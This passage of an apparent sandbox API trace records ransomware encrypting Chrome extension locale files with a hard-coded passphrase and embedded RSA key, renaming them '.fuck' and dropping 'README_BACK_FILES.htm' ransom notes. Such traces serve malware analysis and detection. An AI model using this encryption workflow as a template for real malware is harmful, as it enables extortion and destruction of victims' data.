(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json", dwFileAttributes=0x0) returned 1 [0251.992] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.gsg")) returned 1 [0251.993] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.fuck")) returned 1 [0251.995] CryptDestroyHash (hHash=0x29842e0) returned 1 [0251.995] CryptDestroyKey (hKey=0x29846a0) returned 1 [0251.995] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0251.995] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0251.995] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0251.995] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\readme_back_files.htm")) returned 0xffffffff [0251.995] AreFileApisANSI () returned 1 [0251.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0251.995] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0251.996] GetFileType (hFile=0x5d60) returned 0x1 [0251.996] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0251.997] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0251.997] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0251.998] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.998] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.998] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0251.998] GetLastError () returned 0x0 [0251.998] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json")) returned 0x20 [0251.999] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json", dwFileAttributes=0x80) returned 1 [0251.999] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.000] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.001] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.002] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.004] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.004] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.004] CryptHashData (hHash=0x29846a0, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.004] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29844e0) returned 1 [0252.004] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.004] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.004] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298a838) returned 1 [0252.005] CryptImportPublicKeyInfo (in: hCryptProv=0x298a838, dwCertEncodingType=0x1, pInfo=0x29919a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29919d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29919d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984720) returned 1 [0252.005] CryptEncrypt (in: hKey=0x2984720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.005] CryptEncrypt (in: hKey=0x2984720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298b2d8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298b2d8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.005] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298b2d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298b2d8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.006] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.007] CryptEncrypt (in: hKey=0x29844e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.007] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.007] CloseHandle (hObject=0x5d64) returned 1 [0252.007] CloseHandle (hObject=0x5d5c) returned 1 [0252.008] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json"), bFailIfExists=0) returned 1 [0252.012] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json", dwFileAttributes=0x0) returned 1 [0252.012] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.gsg")) returned 1 [0252.014] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.fuck")) returned 1 [0252.015] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.015] CryptDestroyKey (hKey=0x29844e0) returned 1 [0252.015] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.015] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.015] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.015] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\readme_back_files.htm")) returned 0xffffffff [0252.015] AreFileApisANSI () returned 1 [0252.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.015] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.016] GetFileType (hFile=0x5d60) returned 0x1 [0252.016] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.017] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.017] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.017] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.017] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.017] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.017] GetLastError () returned 0x0 [0252.017] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json")) returned 0x20 [0252.018] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json", dwFileAttributes=0x80) returned 1 [0252.018] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.019] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.019] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.020] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.022] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.022] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.022] CryptHashData (hHash=0x29844e0, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.022] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29844e0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29846a0) returned 1 [0252.022] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.022] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.022] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298b3e8) returned 1 [0252.023] CryptImportPublicKeyInfo (in: hCryptProv=0x298b3e8, dwCertEncodingType=0x1, pInfo=0x29929e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992a10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992a18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29842e0) returned 1 [0252.023] CryptEncrypt (in: hKey=0x29842e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.023] CryptEncrypt (in: hKey=0x29842e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298b030*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298b030*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.023] WriteFile (in: hFile=0x5d64, lpBuffer=0x298b030*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298b030*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.024] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.025] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.025] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.025] CloseHandle (hObject=0x5d5c) returned 1 [0252.025] CloseHandle (hObject=0x5d64) returned 1 [0252.026] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json"), bFailIfExists=0) returned 1 [0252.030] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json", dwFileAttributes=0x0) returned 1 [0252.030] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.gsg")) returned 1 [0252.032] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.fuck")) returned 1 [0252.033] CryptDestroyHash (hHash=0x29844e0) returned 1 [0252.033] CryptDestroyKey (hKey=0x29846a0) returned 1 [0252.033] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.033] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.033] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.033] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\readme_back_files.htm")) returned 0xffffffff [0252.034] AreFileApisANSI () returned 1 [0252.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.034] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.035] GetFileType (hFile=0x5d60) returned 0x1 [0252.035] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.036] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 